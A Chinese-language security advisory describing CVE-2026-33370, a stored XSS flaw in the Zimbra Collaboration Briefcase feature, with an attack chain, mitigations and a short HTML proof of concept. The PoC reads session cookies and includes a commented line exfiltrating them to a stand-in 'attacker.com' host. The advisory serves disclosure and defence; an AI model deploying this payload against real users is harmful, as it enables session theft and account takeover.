CVE-2026-33370 CVSS 6.1 中危

CVE-2026-33370 Zimbra存储型XSS漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33370

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Zimbra Collaboration (ZCS)

漏洞概述

Zimbra Collaboration (ZCS) 10.0和10.1版本的公文包功能存在存储型XSS漏洞。由于对特定上传文件类型的清理不充分，攻击者可上传包含恶意脚本的文件。当受害者打开公开共享的该文件时，脚本将在受害者会话上下文中执行，导致数据窃取或未授权操作。

技术细节

该漏洞源于Zimbra Collaboration (ZCS) 10.0及10.1版本的Briefcase（公文包）组件在处理用户上传文件时，缺乏对特定文件类型的严格内容过滤和输出编码。攻击者无需认证即可利用此漏洞，通过上传包含恶意JavaScript代码的特制文件（例如修改扩展名的HTML文件或利用浏览器渲染特性的文件）至Briefcase中。由于系统在展示文件内容时未进行适当的上下文感知转义，当受害者点击或预览攻击者公开分享的该文件时，Web浏览器会解析并执行嵌入的恶意脚本。攻击者借此窃取受害者的Session ID、进行钓鱼攻击或执行其他未授权操作，完全绕过同源策略限制。

攻击链分析

STEP 1

1. 构造恶意文件

攻击者创建一个包含恶意JavaScript代码的文件（如HTML文件），设计用于在浏览器中执行。

STEP 2

2. 上传文件

攻击者将恶意文件上传到Zimbra Briefcase组件中。

STEP 3

3. 生成分享链接

攻击者利用Briefcase的公开分享功能，生成指向该恶意文件的链接。

STEP 4

4. 诱导访问

攻击者将链接发送给目标受害者，通过社会工程学手段诱导其点击打开。

STEP 5

5. 执行攻击

受害者在浏览器中打开文件，由于未经过滤，恶意脚本在受害者的Zimbra会话上下文中执行，窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-33370 -->
<!-- This payload demonstrates the execution of JS in the victim's browser -->
<html>
<body>
  <h3>Document Preview</h3>
  <script>
    // Simulate exfiltration of session cookies
    var stolenData = document.cookie;
    console.log("[+] Exfiltrating cookies: " + stolenData);
    
    // In a real attack, this would send data to an attacker-controlled server
    // var img = new Image();
    // img.src = "http://attacker.com/steal?c=" + encodeURIComponent(stolenData);
  </script>
</body>
</html>

影响范围

Zimbra Collaboration (ZCS) 10.0

Zimbra Collaboration (ZCS) 10.1

防御指南

临时缓解措施

在未升级补丁前，建议管理员限制Briefcase功能的公开分享权限，仅允许受信任用户使用。用户应避免点击来源不明的Zimbra文件分享链接，并部署Web应用防火墙（WAF）以检测和拦截潜在的XSS攻击载荷。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表